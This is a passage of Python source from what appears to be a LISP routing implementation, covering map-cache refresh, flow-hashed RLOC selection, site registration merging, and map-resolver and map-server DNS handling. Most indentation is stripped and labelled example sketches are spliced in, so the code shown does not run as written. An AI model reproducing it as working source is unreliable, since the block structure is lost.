        # Take the uptime modulo the TTL; if the value falls within the first
        # few seconds of a TTL period, refresh the entry. This triggers a
        # refresh roughly once per map-cache TTL period.
#
elapsed = int((time.time() - self.uptime) % self.map_cache_ttl)
refresh = (elapsed in [0, 1, 2])
if (refresh == False): return(False)
#
# Don't send a refreshing Map-Request if we just sent one.
#
rate_limit = ((time.time() - self.last_multicast_map_request) <= 2)
if (rate_limit): return(False)
self.last_multicast_map_request = lisp_get_timestamp()
return(True)
#enddef
def has_ttl_elapsed(self):
if (self.map_cache_ttl == None): return(False)
elapsed = time.time() - self.last_refresh_time
if (elapsed >= self.map_cache_ttl): return(True)
#
        # TTL is about to elapse. We need to refresh the entry once 90% of
        # the TTL has elapsed (i.e., we are within 10% of expiring).
#
almost_ttl = self.map_cache_ttl - (old_div(self.map_cache_ttl, 10))
if (elapsed >= almost_ttl): return(True)
return(False)
#enddef
def is_active(self):
if (self.stats.last_increment == None): return(False)
elapsed = time.time() - self.stats.last_increment
return(elapsed <= 60)
#enddef
def match_eid_tuple(self, db):
if (self.eid.is_exact_match(db.eid) == False): return(False)
if (self.group.is_exact_match(db.group) == False): return(False)
return(True)
#enddef
def sort_rloc_set(self):
self.rloc_set.sort(key=operator.attrgetter('rloc.address'))
#enddef
def delete_rlocs_from_rloc_probe_list(self):
for rloc in self.best_rloc_set:
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
def build_best_rloc_set(self):
old_best = self.best_rloc_set
self.best_rloc_set = []
if (self.rloc_set == None): return
#
# Get best priority for first up RLOC.
#
pr = 256
for rloc in self.rloc_set:
if (rloc.up_state()): pr = min(rloc.priority, pr)
        #endfor
#
# For each up RLOC with best priority, put in best-rloc for data-plane.
# For each unreachable RLOC that has better priority than the best
# computed above, we want to RLOC-probe. So put in the RLOC probe list
        # and best list. We need to set the last_rloc_probe timestamp or
        # lisp_process_rloc_probe_timer() will think the unreachable RLOC went
        # down and is waiting for an RLOC-probe reply that will never arrive.
#
for rloc in self.rloc_set:
if (rloc.priority <= pr):
if (rloc.unreach_state() and rloc.last_rloc_probe == None):
rloc.last_rloc_probe = lisp_get_timestamp()
#endif
self.best_rloc_set.append(rloc)
#endif
#endfor
#
        # Put the RLOC in lisp.lisp_rloc_probe_list if it isn't already there.
        # And if we removed the RLOC from the best list, we need to remove
        # references to it.
#
for rloc in old_best:
if (rloc.priority < pr): continue
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
for rloc in self.best_rloc_set:
if (rloc.rloc.is_null()): continue
rloc.add_to_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
def select_rloc(self, lisp_packet, ipc_socket):
packet = lisp_packet.packet
inner_version = lisp_packet.inner_version
length = len(self.best_rloc_set)
if (length == 0):
self.stats.increment(len(packet))
return([None, None, None, self.action, None, None])
#endif
ls = 4 if lisp_load_split_pings else 0
hashval = lisp_packet.hash_ports()
if (inner_version == 4):
for i in range(8+ls):
hashval = hashval ^ struct.unpack("B", packet[i+12:i+13])[0]
#endfor
elif (inner_version == 6):
for i in range(0, 32+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i+8:i+12])[0]
#endfor
hashval = (hashval >> 16) + (hashval & 0xffff)
hashval = (hashval >> 8) + (hashval & 0xff)
else:
for i in range(0, 12+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i:i+4])[0]
#endfor
#endif
if (lisp_data_plane_logging):
best = []
for r in self.best_rloc_set:
if (r.rloc.is_null()): continue
best.append([r.rloc.print_address_no_iid(), r.print_state()])
#endfor
dprint("Packet hash {}, index {}, best-rloc-list: {}".format( \
hex(hashval), hashval % length, red(str(best), False)))
#endif
#
# Get hashed value RLOC.
#
rloc = self.best_rloc_set[hashval % length]
#
        # If this RLOC is not in up state because it was taken out of up state
        # by not receiving echoed nonces, try requesting again after some time.
#
echo_nonce = lisp_get_echo_nonce(rloc.rloc, None)
if (echo_nonce):
echo_nonce.change_state(rloc)
if (rloc.no_echoed_nonce_state()):
echo_nonce.request_nonce_sent = None
#endif
#endif
#
        # Find a reachable RLOC.
#
if (rloc.up_state() == False):
stop = hashval % length
index = (stop + 1) % length
while (index != stop):
rloc = self.best_rloc_set[index]
if (rloc.up_state()): break
index = (index + 1) % length
#endwhile
if (index == stop):
self.build_best_rloc_set()
return([None, None, None, None, None, None])
#endif
#endif
#
# We are going to use this RLOC. Increment statistics.
#
rloc.stats.increment(len(packet))
#
# Give RLE preference.
#
if (rloc.rle_name and rloc.rle == None):
if (rloc.rle_name in lisp_rle_list):
rloc.rle = lisp_rle_list[rloc.rle_name]
#endif
#endif
if (rloc.rle): return([None, None, None, None, rloc.rle, None])
#
# Next check if ELP is cached for this RLOC entry.
#
if (rloc.elp and rloc.elp.use_elp_node):
return([rloc.elp.use_elp_node.address, None, None, None, None,
None])
#endif
#
# Return RLOC address.
#
rloc_addr = None if (rloc.rloc.is_null()) else rloc.rloc
port = rloc.translated_port
action = self.action if (rloc_addr == None) else None
#
        # Check to see if we are requesting a nonce to be echoed, or we are
# echoing a nonce.
#
nonce = None
if (echo_nonce and echo_nonce.request_nonce_timeout() == False):
nonce = echo_nonce.get_request_or_echo_nonce(ipc_socket, rloc_addr)
#endif
#
# If no RLOC address, check for native-forward.
#
return([rloc_addr, port, nonce, action, None, rloc])
#enddef
def do_rloc_sets_match(self, rloc_address_set):
if (len(self.rloc_set) != len(rloc_address_set)): return(False)
#
# Compare an array of lisp_address()es with the lisp_mapping()
# rloc-set which is an array of lisp_rloc()s.
#
for rloc_entry in self.rloc_set:
for rloc in rloc_address_set:
if (rloc.is_exact_match(rloc_entry.rloc) == False): continue
rloc = None
break
#endfor
if (rloc == rloc_address_set[-1]): return(False)
#endfor
return(True)
#enddef
def get_rloc(self, rloc):
for rloc_entry in self.rloc_set:
r = rloc_entry.rloc
if (rloc.is_exact_match(r)): return(rloc_entry)
#endfor
return(None)
#enddef
def get_rloc_by_interface(self, interface):
for rloc_entry in self.rloc_set:
if (rloc_entry.interface == interface): return(rloc_entry)
#endfor
return(None)
#enddef
def add_db(self):
if (self.group.is_null()):
lisp_db_for_lookups.add_cache(self.eid, self)
else:
db = lisp_db_for_lookups.lookup_cache(self.group, True)
if (db == None):
db = lisp_mapping(self.group, self.group, [])
lisp_db_for_lookups.add_cache(self.group, db)
#endif
db.add_source_entry(self)
#endif
#enddef
def add_cache(self, do_ipc=True):
if (self.group.is_null()):
lisp_map_cache.add_cache(self.eid, self)
if (lisp_program_hardware): lisp_program_vxlan_hardware(self)
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None):
mc = lisp_mapping(self.group, self.group, [])
mc.eid.copy_address(self.group)
mc.group.copy_address(self.group)
lisp_map_cache.add_cache(self.group, mc)
#endif
if (self.eid.is_null()): self.eid.make_default_route(mc.group)
mc.add_source_entry(self)
#endif
if (do_ipc): lisp_write_ipc_map_cache(True, self)
#enddef
def delete_cache(self):
self.delete_rlocs_from_rloc_probe_list()
lisp_write_ipc_map_cache(False, self)
if (self.group.is_null()):
lisp_map_cache.delete_cache(self.eid)
if (lisp_program_hardware):
prefix = self.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
#endif
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None): return
smc = mc.lookup_source_cache(self.eid, True)
if (smc == None): return
mc.source_cache.delete_cache(self.eid)
if (mc.source_cache.cache_size() == 0):
lisp_map_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_mc):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_mc.eid, source_mc)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def dynamic_eid_configured(self):
return(self.dynamic_eids != None)
#enddef
def star_secondary_iid(self, prefix):
if (self.secondary_iid == None): return(prefix)
iid = "," + str(self.secondary_iid)
return(prefix.replace(iid, iid + "*"))
#enddef
def increment_decap_stats(self, packet):
port = packet.udp_dport
if (port == LISP_DATA_PORT):
rloc = self.get_rloc(packet.outer_dest)
else:
#
# Only works with one translated RLOC.
#
for rloc in self.rloc_set:
if (rloc.translated_port != 0): break
#endfor
#endif
if (rloc != None): rloc.stats.increment(len(packet.packet))
self.stats.increment(len(packet.packet))
#enddef
def rtrs_in_rloc_set(self):
for rloc in self.rloc_set:
if (rloc.is_rtr()): return(True)
#endfor
return(False)
#enddef
def add_recent_source(self, source):
self.recent_sources[source.print_address()] = lisp_get_timestamp()
#enddef
#endclass
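#
# Illustrative sketch (not part of the original code) of the load-splitting
# idea in lisp_mapping.select_rloc(): fold bytes of the inner header into a
# hash value and use it modulo the number of usable RLOCs to pick one, so a
# given flow consistently maps to the same RLOC. The byte-folding here is a
# simplified stand-in for the per-address-family unpacking the real code
# does; inner_header_bytes is assumed to be a bytes object.
#
def lisp_example_select_index(inner_header_bytes, rloc_count):
    if (rloc_count == 0): return(None)
    hashval = 0
    for byte_value in bytearray(inner_header_bytes):
        hashval = hashval ^ byte_value
    #endfor
    return(hashval % rloc_count)
#enddef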
class lisp_dynamic_eid(object):
def __init__(self):
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.interface = None
self.last_packet = None
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#enddef
def get_timeout(self, interface):
try:
lisp_interface = lisp_myinterfaces[interface]
self.timeout = lisp_interface.dynamic_eid_timeout
except:
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#endtry
#enddef
#endclass
class lisp_group_mapping(object):
def __init__(self, group_name, ms_name, group_prefix, sources, rle_addr):
self.group_name = group_name
self.group_prefix = group_prefix
self.use_ms_name = ms_name
self.sources = sources
self.rle_address = rle_addr
#enddef
def add_group(self):
lisp_group_mapping_list[self.group_name] = self
#enddef
#endclass
#
# lisp_is_group_more_specific
#
# Take group address in string format and see if it is more specific than
# the group-prefix in class lisp_group_mapping(). If more specific, return
# mask-length, otherwise return -1.
#
def lisp_is_group_more_specific(group_str, group_mapping):
iid = group_mapping.group_prefix.instance_id
mask_len = group_mapping.group_prefix.mask_len
group = lisp_address(LISP_AFI_IPV4, group_str, 32, iid)
if (group.is_more_specific(group_mapping.group_prefix)): return(mask_len)
return(-1)
#enddef
#
# lisp_lookup_group
#
# Lookup group address in lisp_group_mapping_list{}.
#
def lisp_lookup_group(group):
best = None
for gm in list(lisp_group_mapping_list.values()):
mask_len = lisp_is_group_more_specific(group, gm)
if (mask_len == -1): continue
if (best == None or mask_len > best.group_prefix.mask_len): best = gm
#endfor
return(best)
#enddef
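#
# Example usage sketch (not part of the original code): a caller can do a
# longest-match lookup of a group address string with lisp_lookup_group()
# and, when a mapping is found, pull out the map-server name and configured
# group-prefix. The helper name is hypothetical.
#
def lisp_example_lookup_group(group_str):
    gm = lisp_lookup_group(group_str)
    if (gm == None): return(None)
    return(gm.use_ms_name, gm.group_prefix.print_prefix())
#enddef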
lisp_site_flags = {
"P": "ETR is {}Requesting Map-Server to Proxy Map-Reply",
"S": "ETR is {}LISP-SEC capable",
"I": "xTR-ID and site-ID are {}included in Map-Register",
"T": "Use Map-Register TTL field to timeout registration is {}set",
"R": "Merging registrations are {}requested",
"M": "ETR is {}a LISP Mobile-Node",
"N": "ETR is {}requesting Map-Notify messages from Map-Server"
}
class lisp_site(object):
def __init__(self):
self.site_name = ""
self.description = ""
self.shutdown = False
self.auth_sha1_or_sha2 = False
self.auth_key = {}
self.encryption_key = None
self.allowed_prefixes = {}
self.allowed_prefixes_sorted = []
self.allowed_rlocs = {}
self.map_notifies_sent = 0
self.map_notify_acks_received = 0
#enddef
#endclass
class lisp_site_eid(object):
def __init__(self, site):
self.site = site
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.first_registered = 0
self.last_registered = 0
self.last_registerer = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
self.registered = False
self.registered_rlocs = []
self.auth_sha1_or_sha2 = False
self.individual_registrations = {}
self.map_registers_received = 0
self.proxy_reply_requested = False
self.force_proxy_reply = False
self.force_nat_proxy_reply = False
self.force_ttl = None
self.pitr_proxy_reply_drop = False
self.proxy_reply_action = ""
self.lisp_sec_present = False
self.map_notify_requested = False
self.mobile_node_requested = False
self.echo_nonce_capable = False
self.use_register_ttl_requested = False
self.merge_register_requested = False
self.xtr_id_present = False
self.xtr_id = 0
self.site_id = 0
self.accept_more_specifics = False
self.parent_for_more_specifics = None
self.dynamic = False
self.more_specific_registrations = []
self.source_cache = None
self.inconsistent_registration = False
self.policy = None
self.require_signature = False
self.encrypt_json = False
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_flags(self, html):
if (html == False):
output = "{}-{}-{}-{}-{}-{}-{}".format( \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_register_ttl_requested else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node_requested else "m",
"N" if self.map_notify_requested else "n")
else:
bits = self.print_flags(False)
bits = bits.split("-")
output = ""
for bit in bits:
bit_str = lisp_site_flags[bit.upper()]
bit_str = bit_str.format("" if bit.isupper() else "not ")
output += lisp_span(bit, bit_str)
if (bit.lower() != "n"): output += "-"
#endfor
#endif
return(output)
#enddef
def copy_state_to_parent(self, child):
self.xtr_id = child.xtr_id
self.site_id = child.site_id
self.first_registered = child.first_registered
self.last_registered = child.last_registered
self.last_registerer = child.last_registerer
self.register_ttl = child.register_ttl
if (self.registered == False):
self.first_registered = lisp_get_timestamp()
#endif
self.auth_sha1_or_sha2 = child.auth_sha1_or_sha2
self.registered = child.registered
self.proxy_reply_requested = child.proxy_reply_requested
self.lisp_sec_present = child.lisp_sec_present
self.xtr_id_present = child.xtr_id_present
self.use_register_ttl_requested = child.use_register_ttl_requested
self.merge_register_requested = child.merge_register_requested
self.mobile_node_requested = child.mobile_node_requested
self.map_notify_requested = child.map_notify_requested
#enddef
def build_sort_key(self):
sort_cache = lisp_cache()
ml, key = sort_cache.build_key(self.eid)
gkey = ""
if (self.group.is_null() == False):
gml, gkey = sort_cache.build_key(self.group)
gkey = "-" + gkey[0:12] + "-" + str(gml) + "-" + gkey[12::]
#endif
key = key[0:12] + "-" + str(ml) + "-" + key[12::] + gkey
del(sort_cache)
return(key)
#enddef
def merge_in_site_eid(self, child):
rle_changed = False
if (self.group.is_null()):
self.merge_rlocs_in_site_eid()
else:
rle_changed = self.merge_rles_in_site_eid()
#endif
#
# If a child registration was passed, copy some fields to the parent
# copy.
#
if (child != None):
self.copy_state_to_parent(child)
self.map_registers_received += 1
#endif
return(rle_changed)
#enddef
def copy_rloc_records(self):
new_list = []
for rloc_entry in self.registered_rlocs:
new_list.append(copy.deepcopy(rloc_entry))
#endfor
return(new_list)
#enddef
def merge_rlocs_in_site_eid(self):
self.registered_rlocs = []
for site_eid in list(self.individual_registrations.values()):
if (self.site_id != site_eid.site_id): continue
if (site_eid.registered == False): continue
self.registered_rlocs += site_eid.copy_rloc_records()
#endfor
#
# Remove duplicate RLOC addresses if multiple ETRs registered with
# the same RTR-set.
#
new_list = []
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_null() or len(new_list) == 0):
new_list.append(rloc_entry)
continue
#endif
for re in new_list:
if (re.rloc.is_null()): continue
if (rloc_entry.rloc.is_exact_match(re.rloc)): break
#endfor
if (re == new_list[-1]): new_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_list
#
# Removal case.
#
if (len(self.registered_rlocs) == 0): self.registered = False
return
#enddef
def merge_rles_in_site_eid(self):
#
# Build temporary old list of RLE nodes in dictionary array.
#
old_rle = {}
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle == None): continue
for rle_node in rloc_entry.rle.rle_nodes:
addr = rle_node.address.print_address_no_iid()
old_rle[addr] = rle_node.address
#endfor
break
#endif
#
# Merge in all RLOC entries of an RLOC-set.
#
self.merge_rlocs_in_site_eid()
#
# Remove RLEs that were added as RLOC-records in merge_rlocs_in_
# site_eid(). We only care about the first RLE that is the merged
# set of all the individual registered RLEs. We assume this appears
# first and that all subsequent RLOC-records are the RTR list for
# each registering ETR.
#
new_rloc_list = []
for rloc_entry in self.registered_rlocs:
if (self.registered_rlocs.index(rloc_entry) == 0):
new_rloc_list.append(rloc_entry)
continue
#endif
if (rloc_entry.rle == None): new_rloc_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_rloc_list
#
# Merge RLEs from individuals into master copy and make a temporary
        # new_rle list to compare with old_rle. If there is an RLOC-name for
        # the RLE, clear it from the merged registration. We want names to
        # be per RLE entry and not on the RLOC-record entry it resides in.
#
rle = lisp_rle("")
new_rle = {}
rloc_name = None
for site_eid in list(self.individual_registrations.values()):
if (site_eid.registered == False): continue
irle = site_eid.registered_rlocs[0].rle
if (irle == None): continue
rloc_name = site_eid.registered_rlocs[0].rloc_name
for irle_node in irle.rle_nodes:
addr = irle_node.address.print_address_no_iid()
if (addr in new_rle): break
rle_node = lisp_rle_node()
rle_node.address.copy_address(irle_node.address)
rle_node.level = irle_node.level
rle_node.rloc_name = rloc_name
rle.rle_nodes.append(rle_node)
new_rle[addr] = irle_node.address
#endfor
#endfor
#
# Store new copy.
#
if (len(rle.rle_nodes) == 0): rle = None
if (len(self.registered_rlocs) != 0):
self.registered_rlocs[0].rle = rle
if (rloc_name): self.registered_rlocs[0].rloc_name = None
#endif
#
# Check for changes.
#
if (list(old_rle.keys()) == list(new_rle.keys())): return(False)
lprint("{} {} from {} to {}".format( \
green(self.print_eid_tuple(), False), bold("RLE change", False),
list(old_rle.keys()), list(new_rle.keys())))
return(True)
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.add_cache(self.eid, self)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None):
se = lisp_site_eid(self.site)
se.eid.copy_address(self.group)
se.group.copy_address(self.group)
lisp_sites_by_eid.add_cache(self.group, se)
#
                # See lisp_site_eid_lookup() for special-case details on
                # longest-match lookups for (S,G) entries.
#
se.parent_for_more_specifics = self.parent_for_more_specifics
#endif
if (self.eid.is_null()): self.eid.make_default_route(se.group)
se.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.delete_cache(self.eid)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None): return
site_eid = se.lookup_source_cache(self.eid, True)
if (site_eid == None): return
if (se.source_cache == None): return
se.source_cache.delete_cache(self.eid)
if (se.source_cache.cache_size() == 0):
lisp_sites_by_eid.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_se):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_se.eid, source_se)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
def eid_record_matches(self, eid_record):
if (self.eid.is_exact_match(eid_record.eid) == False): return(False)
if (eid_record.group.is_null()): return(True)
return(eid_record.group.is_exact_match(self.group))
#enddef
def inherit_from_ams_parent(self):
parent = self.parent_for_more_specifics
if (parent == None): return
self.force_proxy_reply = parent.force_proxy_reply
self.force_nat_proxy_reply = parent.force_nat_proxy_reply
self.force_ttl = parent.force_ttl
self.pitr_proxy_reply_drop = parent.pitr_proxy_reply_drop
self.proxy_reply_action = parent.proxy_reply_action
self.echo_nonce_capable = parent.echo_nonce_capable
self.policy = parent.policy
self.require_signature = parent.require_signature
self.encrypt_json = parent.encrypt_json
#enddef
def rtrs_in_rloc_set(self):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rtr_in_rloc_set(self, rtr_rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_exact_match(rtr_rloc) == False): continue
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rloc_in_rloc_set(self, rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle):
for rle in rloc_entry.rle.rle_nodes:
if (rle.address.is_exact_match(rloc)): return(True)
#endif
#endif
if (rloc_entry.rloc.is_exact_match(rloc)): return(True)
#endfor
return(False)
#enddef
def do_rloc_sets_match(self, prev_rloc_set):
if (len(self.registered_rlocs) != len(prev_rloc_set)): return(False)
for rloc_entry in prev_rloc_set:
old_rloc = rloc_entry.rloc
if (self.is_rloc_in_rloc_set(old_rloc) == False): return(False)
#endfor
return(True)
#enddef
#endclass
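#
# Illustrative sketch (not part of the original code) of the flag-string
# convention used by lisp_site_eid.print_flags(): each Map-Register flag is
# shown as its letter in uppercase when set and lowercase when clear, joined
# with dashes (for example "P-s-I-t-r-m-N"). The input is assumed to be a
# list of (letter, boolean) tuples; the function name is an example only.
#
def lisp_example_flags_string(letters_and_bits):
    flags = []
    for letter, bit in letters_and_bits:
        flags.append(letter.upper() if bit else letter.lower())
    #endfor
    return("-".join(flags))
#enddef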
class lisp_mr(object):
def __init__(self, addr_str, dns_name, mr_name):
self.mr_name = mr_name if (mr_name != None) else "all"
self.dns_name = dns_name
self.map_resolver = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (addr_str):
self.map_resolver.store_address(addr_str)
self.insert_mr()
else:
self.resolve_dns_name()
#endif
self.last_used = 0
self.last_reply = 0
self.last_nonce = 0
self.map_requests_sent = 0
self.neg_map_replies_received = 0
self.total_rtt = 0
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
        # Check if the number of A-records has changed and this one is no
        # longer valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_mr()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_resolver.print_address_no_iid()):
self.delete_mr()
self.map_resolver.store_address(addr)
self.insert_mr()
#endif
#
        # If this is a pull-based LISP-Decent DNS suffix, then create another
        # lisp_mr() for each A-record. Only the master (A-record index 0)
        # does this.
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
mr = lisp_get_map_resolver(a, None)
if (mr != None and mr.a_record_index == a_records.index(addr)):
continue
#endif
mr = lisp_mr(addr, None, None)
mr.a_record_index = a_records.index(addr)
mr.dns_name = self.dns_name
mr.last_dns_resolve = lisp_get_timestamp()
#endfor
#
# Check for deletes.
#
delete_list = []
for mr in list(lisp_map_resolvers_list.values()):
if (self.dns_name != mr.dns_name): continue
a = mr.map_resolver.print_address_no_iid()
if (a in a_records): continue
delete_list.append(mr)
#endfor
for mr in delete_list: mr.delete_mr()
#enddef
def insert_mr(self):
key = self.mr_name + self.map_resolver.print_address()
lisp_map_resolvers_list[key] = self
#enddef
def delete_mr(self):
key = self.mr_name + self.map_resolver.print_address()
if (key not in lisp_map_resolvers_list): return
lisp_map_resolvers_list.pop(key)
#enddef
#endclass
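#
# Illustrative sketch (not part of the original code) of the DNS lookup that
# lisp_mr.resolve_dns_name() and lisp_ms.resolve_dns_name() rely on:
# socket.gethostbyname_ex() returns (hostname, alias-list, address-list),
# and the address list is what gets walked by a_record_index. The helper
# name is hypothetical and lookup failures are mapped to an empty list.
#
def lisp_example_get_a_records(dns_name):
    try:
        hostname, aliases, a_records = socket.gethostbyname_ex(dns_name)
        return(a_records)
    except:
        return([])
    #endtry
#enddef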
class lisp_ddt_root(object):
def __init__(self):
self.root_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.priority = 0
self.weight = 0
#enddef
#endclass
class lisp_referral(object):
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_set = {}
self.referral_type = LISP_DDT_ACTION_NULL
self.referral_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_ttl = 0
self.uptime = lisp_get_timestamp()
self.expires = 0
self.source_cache = None
#enddef
def print_referral(self, eid_indent, referral_indent):
uts = lisp_print_elapsed(self.uptime)
ets = lisp_print_future(self.expires)
lprint("{}Referral EID {}, uptime/expires {}/{}, {} referrals:". \
format(eid_indent, green(self.eid.print_prefix(), False), uts,
ets, len(self.referral_set)))
for ref_node in list(self.referral_set.values()):
ref_node.print_ref_node(referral_indent)
#endfor
#enddef
def print_referral_type(self):
if (self.eid.afi == LISP_AFI_ULTIMATE_ROOT): return("root")
if (self.referral_type == LISP_DDT_ACTION_NULL):
return("null-referral")
#endif
if (self.referral_type == LISP_DDT_ACTION_SITE_NOT_FOUND):
return("no-site-action")
#endif
if (self.referral_type > LISP_DDT_ACTION_MAX):
return("invalid-action")
#endif
return(lisp_map_referral_action_string[self.referral_type])
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.referral_ttl
if (ttl < 60): return(str(ttl) + " secs")
if ((ttl % 60) == 0):
ttl = str(old_div(ttl, 60)) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def is_referral_negative(self):
return (self.referral_type in \
(LISP_DDT_ACTION_MS_NOT_REG, LISP_DDT_ACTION_DELEGATION_HOLE,
LISP_DDT_ACTION_NOT_AUTH))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_referral_cache.add_cache(self.eid, self)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None):
ref = lisp_referral()
ref.eid.copy_address(self.group)
ref.group.copy_address(self.group)
lisp_referral_cache.add_cache(self.group, ref)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ref.group)
ref.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_referral_cache.delete_cache(self.eid)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None): return
sref = ref.lookup_source_cache(self.eid, True)
if (sref == None): return
ref.source_cache.delete_cache(self.eid)
if (ref.source_cache.cache_size() == 0):
lisp_referral_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_ref):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ref.eid, source_ref)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
#endclass
class lisp_referral_node(object):
def __init__(self):
self.referral_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.priority = 0
self.weight = 0
self.updown = True
self.map_requests_sent = 0
self.no_responses = 0
self.uptime = lisp_get_timestamp()
#enddef
def print_ref_node(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}referral {}, uptime {}, {}, priority/weight: {}/{}".format( \
indent, red(self.referral_address.print_address(), False), ts,
"up" if self.updown else "down", self.priority, self.weight))
#enddef
#endclass
class lisp_ms(object):
def __init__(self, addr_str, dns_name, ms_name, alg_id, key_id, pw, pr,
mr, rr, wmn, site_id, ekey_id, ekey):
self.ms_name = ms_name if (ms_name != None) else "all"
self.dns_name = dns_name
self.map_server = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (lisp_map_servers_list == {}):
self.xtr_id = lisp_get_control_nonce()
else:
self.xtr_id = list(lisp_map_servers_list.values())[0].xtr_id
#endif
self.alg_id = alg_id
self.key_id = key_id
self.password = pw
self.proxy_reply = pr
self.merge_registrations = mr
self.refresh_registrations = rr
self.want_map_notify = wmn
self.site_id = site_id
self.map_registers_sent = 0
self.map_registers_multicast_sent = 0
self.map_notifies_received = 0
self.map_notify_acks_sent = 0
self.ekey_id = ekey_id
self.ekey = ekey
if (addr_str):
self.map_server.store_address(addr_str)
self.insert_ms()
else:
self.resolve_dns_name()
#endif
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
        # Check if the number of A-records has changed and this one is no
        # longer valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_ms()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_server.print_address_no_iid()):
self.delete_ms()
self.map_server.store_address(addr)
self.insert_ms()
#endif
#
        # If this is a pull-based LISP-Decent DNS suffix, then create another
        # lisp_ms() for each A-record. Only the master (A-record index 0)
        # does this.
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
ms = lisp_get_map_server(a)
if (ms != None and ms.a_record_index == a_records.index(addr)):
continue
#endif
ms = copy.deepcopy(self)
ms.map_server.store_address(addr)
ms.a_record_index = a_records.index(addr)
ms.last_dns_resolve = lisp_get_timestamp()
ms.insert_ms()
#endfor
#
# Check for deletes.
#
delete_list = []
for ms in list(lisp_map_servers_list.values()):
if (self.dns_name != ms.dns_name): continue
a = ms.map_server.print_address_no_iid()
if (a in a_records): continue
delete_list.append(ms)
#endfor
for ms in delete_list: ms.delete_ms()
#enddef
def insert_ms(self):
key = self.ms_name + self.map_server.print_address()
lisp_map_servers_list[key] = self
#enddef
def delete_ms(self):
